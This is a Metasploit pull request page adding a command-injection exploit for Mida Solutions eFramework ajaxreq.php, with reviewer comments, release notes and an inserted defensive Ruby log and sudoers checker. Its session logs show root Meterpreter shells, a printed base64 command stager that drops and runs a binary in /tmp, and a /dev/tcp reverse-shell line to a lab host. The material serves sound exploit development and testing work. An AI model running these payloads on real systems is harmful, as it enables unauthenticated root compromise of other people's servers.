
Add Mida Solutions eFramework ajaxreq.php Command Injection #14074

Merged 3 commits, Sep 16, 2020

Conversation

bcoles (Contributor) commented Aug 30, 2020

Vulnerable Application

This module exploits a command injection vulnerability in
Mida Solutions eFramework
version 2.9.0 and prior.

The ajaxreq.php file allows unauthenticated users to inject
arbitrary commands in the PARAM parameter to be executed as
the apache user. The sudo configuration permits the apache user
to execute any command as root without providing a password,
resulting in privileged command execution as root.

This module has been successfully tested on the Mida Solutions
eFramework-C7-2.9.0 virtual appliance.

Download:

http://ova-efw.midasolutions.com/

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce
  3. Do: set RHOSTS [IP]
  4. Do: set payload [payload]
  5. Do: set LHOST [IP]
  6. Do: exploit

Options

TARGETURI

Base path to eFramework (Default: /)

Scenarios

msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
rhosts => 172.16.191.123
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
[+] 172.16.191.123:443 - The target is vulnerable.
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (3008420 bytes) to 172.16.191.123
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
[*] Command Stager progress - 100.00% done (897/897 bytes)

meterpreter > getuid
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.16.191.123
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
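As an added example, not code from the PR or from the Metasploit module, the following Ruby script shows the defender-side checks that follow from the description above: it scans constructed Apache access-log lines for requests to ajaxreq.php whose decoded PARAM value contains shell metacharacters, and it audits a constructed sudoers fragment for entries that let a web-server account run ALL commands as root without a password. The log format, addresses and sudoers lines are assumptions. The PR does not show the request the module actually sends, so the log check flags any shell metacharacter in PARAM rather than one specific injection string.

```ruby
require 'cgi'

# Added example, not code from the PR or the Metasploit module. Everything below
# (log lines, IP addresses, sudoers content) is constructed for illustration.

# Shell metacharacters that have no business in a PARAM value. The PR does not
# show the exact injection string the module sends, so any of these is flagged.
SHELL_META = /[;&|`$()<>\n]/.freeze

# Apache "combined"/"common" log line: client, timestamp, request line, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<uri>\S+) \S+" (?<status>\d{3})/.freeze

# Constructed access-log sample: one benign ajaxreq.php call and three that carry
# shell metacharacters in PARAM, encoded (%3B is ';', %24 is '$') or raw.
SAMPLE_ACCESS_LOG = <<~LOG
  192.0.2.10 - - [30/Aug/2020:08:42:20 -0400] "GET /index.php HTTP/1.1" 200 5120
  192.0.2.10 - - [30/Aug/2020:08:42:25 -0400] "GET /ajaxreq.php?PARAM=status HTTP/1.1" 200 87
  198.51.100.7 - - [30/Aug/2020:08:42:27 -0400] "GET /ajaxreq.php?PARAM=status%3Bid HTTP/1.1" 200 140
  198.51.100.7 - - [30/Aug/2020:08:42:29 -0400] "GET /ajaxreq.php?PARAM=x;id HTTP/1.1" 200 140
  198.51.100.7 - - [30/Aug/2020:08:42:31 -0400] "GET /ajaxreq.php?PARAM=%24(id) HTTP/1.1" 200 140
LOG

# Constructed sudoers fragment: the weak entry the PR describes next to a
# least-privilege entry that only allows one specific command.
SAMPLE_SUDOERS = <<~SUDOERS
  # constructed example, not the appliance's real /etc/sudoers
  Defaults requiretty
  root ALL=(ALL) ALL
  apache ALL=(ALL) NOPASSWD: ALL
  apache ALL=(root) NOPASSWD: /usr/bin/systemctl restart httpd
  %wheel ALL=(ALL) ALL
SUDOERS

# Parse one log line into a hash of fields, or nil if it is not in that format.
def parse_log_line(line)
  m = LOG_RE.match(line)
  return nil unless m

  { ip: m[:ip], time: m[:time], method: m[:method], uri: m[:uri], status: m[:status].to_i }
end

# URL-decoded PARAM value from a request URI's query string, or nil if absent.
# The query is split by hand: URI.parse raises on characters such as '|', and
# CGI.parse treats a raw ';' as a pair separator, so both would hide exactly
# the requests this check is looking for.
def param_value(uri)
  query = uri.split('?', 2)[1]
  return nil if query.nil? || query.empty?

  query.split('&').each do |pair|
    key, val = pair.split('=', 2)
    next if key.nil?
    return CGI.unescape(val.to_s) if CGI.unescape(key) == 'PARAM'
  end
  nil
end

# Requests to ajaxreq.php whose decoded PARAM value contains shell metacharacters.
def suspicious_ajaxreq_requests(log_lines)
  log_lines.each_with_object([]) do |line, hits|
    rec = parse_log_line(line)
    next unless rec && rec[:uri].include?('ajaxreq.php')

    value = param_value(rec[:uri])
    next unless value && value.match?(SHELL_META)

    hits << rec.merge(param: value)
  end
end

# sudoers entries that let one of the given accounts run ALL commands as root
# (explicit (ALL)/(root) runas, or no runas clause, which defaults to root)
# without a password. Entries that name specific commands are not flagged.
def passwordless_root_entries(sudoers_text, users: %w[apache www-data nginx])
  sudoers_text.each_line.each_with_object([]) do |raw, found|
    line = raw.strip
    next if line.empty? || line.start_with?('#')

    user, spec = line.split(/\s+/, 2)
    next unless spec && users.include?(user)
    next unless spec.match?(/=\s*(?:\(\s*(?:ALL|root)\b[^)]*\)\s*)?NOPASSWD:\s*ALL\s*\z/)

    found << line
  end
end

if $PROGRAM_NAME == __FILE__
  suspicious_ajaxreq_requests(SAMPLE_ACCESS_LOG.lines).each do |r|
    puts "#{r[:time]} #{r[:ip]} #{r[:method]} ajaxreq.php PARAM=#{r[:param].inspect}"
  end
  passwordless_root_entries(SAMPLE_SUDOERS).each { |l| puts "sudoers: #{l}" }
end
```

An access log only records the request line, so this only sees PARAM when it travels in the query string; if the module or an attacker sends it in a POST body, the evidence has to come from a reverse proxy, WAF or PHP-side request logging instead. On the sudoers side, the flagged line is the one the PR describes; the second apache entry in the sample shows the shape of a least-privilege replacement (one fully qualified command, still NOPASSWD if the application needs it non-interactively), which removes the root step even if another injection is found later.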

gwillcox-r7 (Contributor) commented:

@bcoles Can you please update your PR description? A blank PR description isn't very helpful for understanding what's going on here, and we tend to close issues with blank PR descriptions.

Also for future reference, it would be helpful if you could include a link to where one can download the software. I managed to find a working link at https://www.dropbox.com/s/p3ivbhn3y4xvrpp/eFramework-C7-2.9.0.ova?dl=0 but I'm not sure if this is the official software or not.

Review comment (Contributor) on these lines of the module documentation:

    The `ajaxreq.php` file allows unauthenticated users to inject
    arbitrary commands in the `PARAM` parameter to be executed as the
    apache user. This user is permitted to execute any command as root
    using sudo without providing a password, resulting in privileged

by using the sudo command without providing a password -> This would read better in my opinion and would reflect the fact that sudo is a command more appropriately within this paragraph.

@bcoles bcoles closed this Aug 31, 2020
@bcoles bcoles deleted the mida_solutions_eframework_ajaxreq_rce branch August 31, 2020 16:27
@bcoles bcoles restored the mida_solutions_eframework_ajaxreq_rce branch September 11, 2020 17:16
@bcoles bcoles reopened this Sep 11, 2020
@gwillcox-r7 gwillcox-r7 removed their assignment Sep 11, 2020
@space-r7 space-r7 self-assigned this Sep 14, 2020
space-r7 (Contributor) commented:

Hey @bcoles, that link is not working for me. Is there another method you went through to get this software? If a trial is sufficient, I can do that. Thanks!

space-r7 (Contributor) commented:

Code and docs lgtm.

Tested:

msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > options

Module options (exploit/linux/http/mida_solutions_eframework_ajaxreq_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to eFramework
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhost 192.168.37.132
rhost => 192.168.37.132
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Command output: uid=0(root) gid=0(root) groups=0(root)

[+] The target is vulnerable.
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAALAEAAAAAAADgAQAAAAAAAAAQAAAAAAAA6ydbU1+wbPyudf1XWVNeigYwB0j/x0j/xmaBP0uhdAeAPmx16uvm/+Ho1P///wNsSzL8aQpbmrUTS4rVTjLKaSFCWbEEDAZLhsN7UmkJQlpTaSpbmmkBXGkCXQwGS4bDezhLlEu6AQMSX8OrJgJSS4rlaRNZaSlbDAZaS4bDeiZK/Mp3G1RpIFtpA2kGS4rkSzL1DAZaWlxLhsN6xGk/W2kCXAwGXWl9WQwGS4bDe+785Uuh>>'/tmp/GrRZy.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/HFFAn' < '/tmp/GrRZy.b64' ; chmod +x '/tmp/HFFAn' ; '/tmp/HFFAn' & sleep 2 ; rm -f '/tmp/HFFAn' ; rm -f '/tmp/GrRZy.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.37.132
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.132:54650) at 2020-09-16 10:15:02 -0500
[*] Command Stager progress - 100.00% done (897/897 bytes)

meterpreter > getuid
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.132
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.132 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set target 2
target => 2
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[+] 0<&63-;exec 63<>/dev/tcp/192.168.37.1/4444;sh <&63 >&63 2>&63
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Command output: uid=0(root) gid=0(root) groups=0(root)

[+] The target is vulnerable.
[*] Command shell session 3 opened (192.168.37.1:4444 -> 192.168.37.132:55322) at 2020-09-16 10:19:10 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux eFramework-1 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

@space-r7 space-r7 merged commit 0f0d6a2 into rapid7:master Sep 16, 2020
space-r7 (Contributor) commented Sep 16, 2020

Release Notes

New module exploits/linux/http/mida_solutions_eframework_ajaxreq_rce provides an exploit for Mida Solutions eFramework versions 2.9.0 and below, allowing unauthenticated shell commands to be executed as the apache user via the PARAM parameter in requests to ajaxreq.php. Because the sudo configuration allows the apache user to execute commands without requiring a password, this vector ultimately achieves code execution as the root user.

@bcoles bcoles deleted the mida_solutions_eframework_ajaxreq_rce branch September 16, 2020 16:06
@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 29, 2020
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)